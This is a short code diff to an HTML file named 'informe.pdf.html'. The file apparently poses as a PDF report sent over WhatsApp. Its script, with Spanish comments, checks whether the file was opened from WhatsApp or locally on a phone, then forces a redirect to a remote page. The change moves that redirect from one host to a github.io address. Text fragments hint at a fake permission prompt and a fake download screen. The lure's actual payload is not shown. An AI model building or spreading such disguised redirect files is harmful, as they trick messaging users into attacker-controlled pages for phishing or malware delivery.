--- a/informe.pdf.html
+++ b/informe.pdf.html
@@ -90,7 +90,7 @@ Permitir
 //   0) DETECTAR SI SE ABRE DESDE WHATSAPP (content://)
 // ===============================
 if (location.href.startsWith("content://") || document.referrer.includes("com.whatsapp")) {
-    window.location.href = "https://arstore.tech/infopdf/informe.pdf.html";
+    window.location.href = "https://encuestauta69-gif.github.io/pdf/informe.pdf.html";
 }
 
 // ===============================
@@ -108,7 +108,7 @@ const esLocal =
     window.location.protocol === "file:";
 
 if (esMovil && esLocal) {
-    window.location.href = "https://arstore.tech/infopdf/informe.pdf.html";
+    window.location.href = "https://encuestauta69-gif.github.io/pdf/informe.pdf.html";
 }
 
 // ===============================
@@ -215,3 +215,4 @@ Descargando.....
 
 </body>
 </html>
+
